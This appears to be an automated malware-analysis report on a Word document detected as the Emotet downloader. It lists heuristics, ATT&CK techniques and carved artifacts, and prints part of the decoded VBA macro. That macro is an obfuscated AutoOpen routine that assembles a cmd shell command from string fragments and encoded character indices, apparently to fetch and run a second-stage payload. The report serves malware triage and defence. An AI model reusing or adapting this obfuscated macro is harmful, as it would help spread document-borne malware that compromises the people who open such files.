MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains a VBA macro with an AutoOpen function, a common indicator for malicious documents. The ClamAV detection explicitly identifies it as Emotet, a known downloader family. The macro attempts to execute a command by concatenating strings, likely to download and run a second-stage payload, which is a typical Emotet behavior.
Heuristics 5
-
ClamAV: Doc.Downloader.Emotet-6803955-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6803955-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5654 bytes |
SHA-256: d4c230babd4acd805a1aa4db0b2dd430e0cb869655d01d08ef6e5cba3c58bbf6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "sDOZivbn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
AppActivate wBPlM
AppActivate 2879
AppActivate Hex(NoPWBD)
AppActivate Sgn(GGVzB)
AppActivate CSng(28893 + KzluMZ)
Shell@ CVar("cm") + OMbBwQUYnZAhjs + UctCBAcBmcE + NZwBAP + MVNYwp + KsMaLTjBlU + EWibjRcwwOk + WMjXjSfhh, 580251827 - 580251827
AppActivate mKiIIo
AppActivate ChrB(JGYhJa)
End Sub
Attribute VB_Name = "sBFWiOvbYOpsi"
Function NZwBAP()
On Error Resume Next
AppActivate 4652
AppActivate CInt(pOnRI)
KJAzDljQ = "d /" + "V:O/C" + CStr(Chr(itdGiziA + ijjNAUZrCRBqkY + 34 + wGjwVIKSchcVB + DTIiZnnI)) + "s" + "et x28L=" + "jkHlL" + "JzFTWVO" + "Qz"
AppActivate Round(1)
AppActivate 9
HUGjV = "hzXBmUhjjH" + "kR\5PvK@" + "n-9i" + "'0uy1" + ".}6" + "a" + ") " + "="
AppActivate 420444513
AppActivate CBool(siuLLl - IwtUr + jiPVtd / 35839)
ctcPzGiAi = "sfw38/gN" + "x" + "Z(:qp+Gtdb" + "$r;DCeco,{" + "S"
AppActivate Tan(ZcsBo)
AppActivate Sin(wbczY)
AppActivate Hex(1)
SNEdEUIaXuj = "&&for %D " + "in (6" + "1,74," + "50,72," + "68,4" + "8,20,72,3," + "3,46,67,6"
AppActivate Chr(isOKf + 21139 - BMRAo / biVCVR)
AppActivate CLng(97)
AppActivate CBool(wOFwtv - 77527 + 53179 - vunlU)
GFrVfK = "6,22,6" + "0,47,32," + "72,50,3" + "3" + ",74" + ",66,22" + ",72" + ",73," + "64,46,55" + "," + "72,64,41" + ",9,7"
AppActivate WFXHi
AppActivate Round(XIzUB)
ihtDrZlBAqw = "2,66,71,3," + "3" + "5,72," + "32,6" + "4,69,67,68" + ",17" + ",65,47" + ",36,20,6" + "4,64,61," + "59,53," + "53,2"
AppActivate 6
AppActivate 4730
AppActivate QRDju
dcBwWHi = "4,20,44,3" + "2,44,32,65" + ",18,38" + ",72,1" + "5,1" + "5,35," + "32,41,73," + "74" + ",18," + "53,25,"
AppActivate 946
AppActivate CByte(UQRjwm)
nzZIM = "37,17,39" + ",35,11" + ",5" + "1" + ",66" + ",3"
AppActivate Int(LKJvw * McjwVj)
AppActivate CByte(15)
pSVwKQ = "1,20,64" + ",64,61,5" + "9,53,53," + "61,4" + "4,68,35" + ",48," + "72,3,41" + "," + "6" + "1,3," + "5"
AppActivate CStr(23966 + hMnmHl)
AppActivate ChrB(NVRlt)
tiBNbNpOsd = "3,5,7" + "4,1" + "1,56,19,7" + "7,5" + "7" + ",15,31,20," + "64,64"
NZwBAP = KJAzDljQ + HUGjV + ctcPzGiAi + SNEdEUIaXuj + GFrVfK + ihtDrZlBAqw + dcBwWHi + nzZIM + pSVwKQ + tiBNbNpOsd
AppActivate ChrW(KGfwk)
AppActivate CFHulw
AppActivate 543
End Function
Function MVNYwp()
On Error Resume Next
AppActivate YMtdcl
AppActivate Atn(2617)
oQUksbuj = ",61,59,53" + "," + "53,35,18" + ",7" + "2" + ",54,35,73" + ",44,41,73" + ",74,18,53," + "56,2" + "3,63,34,4" + "0,1" + "7,31,"
AppActivate CByte(143549204)
AppActivate Tan(414)
VVociqMmj = "20,6" + "4,64" + ",61,59," + "53" + ",53,22,65," + "7" + "3,44,41,35" + ",32"
AppActivate Round(rHdiD)
AppActivate CDbl(wTjSub)
ICTEz = ",53,73," + "38,52" + ",48," + "20,24" + ",50,3" + "1,20,64,64" + ",61," + "59,5" + "3,53,73,7" + "4,32,4" + "8,74" + ",68,73,"
AppActivate DomMT
AppActivate icinM
AppActivate aMARG
YAHFR = "35,74," + "48,48,72" + ",6" + "8,6" + "8,44" + ",54,44" + ",38,73," + "20,44,41,7" + "3,74," + "18,41,66" + ",68,53,43," + "43,64,19," + "10,36,41"
AppActivate 4069
AppActivate Sqr(63420 * RzEdaj)
luibthqAY = ",77,61" + ",3,35,64,5" + "8,36,31," + "36,45,69" + ",6" + "7,22,19,3" + "8," + "46" + ",47,46," + "36,43,27"
AppActivate Cos(IuFaQs * vCSCtZ * CjiHO * IJOvoW)
AppActivate Tan(jAdzp / fXzOW)
CGQkUKMiZWw = ",27," + "36,69,67" + ",18" + ",29,64," + "4" + "7,67," + "72,32" + "," + "29,59,64," + "72,18," + "61,62,3" + "6,26,36,6" + "2,67,22"
AppActivate 9160
AppActivate wBiBr
AppActivate wwbmk
HVNjKCMiA = ",1" + "9,38," + "62,36,41" + ",72," + "56,7" + "2" + ",36,69,4" + "9,74,68,72" + ",44,73" + ",20,5"
MVNYwp = oQUksbuj + VVociqMmj + ICTEz + YAHFR + luibthqAY + CGQkUKMiZWw + HVNjKCMiA
AppActivate Round(57721 - EmECNE)
Ap
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.